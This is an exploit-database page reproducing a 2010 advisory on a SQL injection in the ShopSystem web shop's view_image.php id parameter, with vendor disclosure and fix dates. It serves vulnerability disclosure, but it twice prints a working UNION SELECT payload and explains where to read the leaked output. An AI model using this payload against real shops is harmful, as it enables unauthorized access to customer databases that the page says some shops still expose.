header-logo
Suggest Exploit
vendor:
ShopSystem
by:
Valentin Hoebel
8,8
CVSS
HIGH
SQL Injection
89
CWE
Product Name: ShopSystem
Affected Version From: Unknown
Affected Version To: Unknown
Patch Exists: Yes
Related CWE: N/A
CPE: N/A
Metasploit: N/A
Other Scripts: N/A
Tags: N/A
CVSS Metrics: N/A
Nuclei References: N/A
Nuclei Metadata: N/A
Platforms Tested: N/A
2010

ShopSystem SQL Injection vulnerability

ShopSystems is a German IT company. They offer webdesign, hosting and training services. One of their most famous products is the software ShopSystem. It is an online shop and allows their customers to offer their products online. Like in other shops it is possible to provide pictures which show the product being offered. By clicking on the image the view gets enlarged (file: view_image.php) and MySQL injection through the ID parameter is possible. Vulnerable URL: http://some-cool-domain.tld/shop/view_image.php?id=XX Exploit vulnerability, e.g. by displaying the current database: http://some-cool-domain.tld/shop/view_image.php?id=XX+AND+1=2+UNION+SELECT+concat(database()),2,3- Note: The MySQL output gets displayed within the image URL, so you have to view the source code of the current page in order to retrieve your information.

Mitigation:

Vendor fixed the vulnerability on 06.04.2010, however some shops are still affected.
Source

Exploit-DB raw data:

# Exploit Title: ShopSystem SQL Injection vulnerability
# Date: 05.04.2010
# Author: Valentin
# Category: webapps/0day


:: General information
:: ShopSystem SQL Injection vulnerability
:: by Valentin Hoebel
:: valentin@xenuser.org

:: Product information
:: Name = ShopSystem
:: Vendor = ShopSystems
:: Vendor Website = http://www.shopsystems.biz/
:: About the product = http://www.shopsystems.biz/shopsystem/uebersichtshopsystem/mietshop.php
:: Affected versions = Versions unknown


:: SQL Injection vulnerability
ShopSystems is a German IT company. They offer webdesign, hosting and training services. One of their most famous products is the software ShopSystem. It is an online shop and allows their customers to offer their products online.
Like in other shops it is possible to provide pictures which show the product being offered.
By clicking on the image the view gets enlarged (file: view_image.php) and MySQL injection through the ID parameter is possible.

Vulnerable URL
http://some-cool-domain.tld/shop/view_image.php?id=XX

Exploit vulnerability, e.g. by displaying the current database:
http://some-cool-domain.tld/shop/view_image.php?id=XX+AND+1=2+UNION+SELECT+concat(database()),2,3-

Note: The MySQL output gets displayed within the image URL, so you have to view the source code of the current page in order to retrieve your information.


:: Additional information
:: Vendor notified = 05.04.2010
:: Reply received = 05.04.2010
:: Vulnerability fixed = 06.04.2010, some shops are still affected
:: Advisory published = 06.04.2010

Navigation

Suggest Exploit

Services By CQR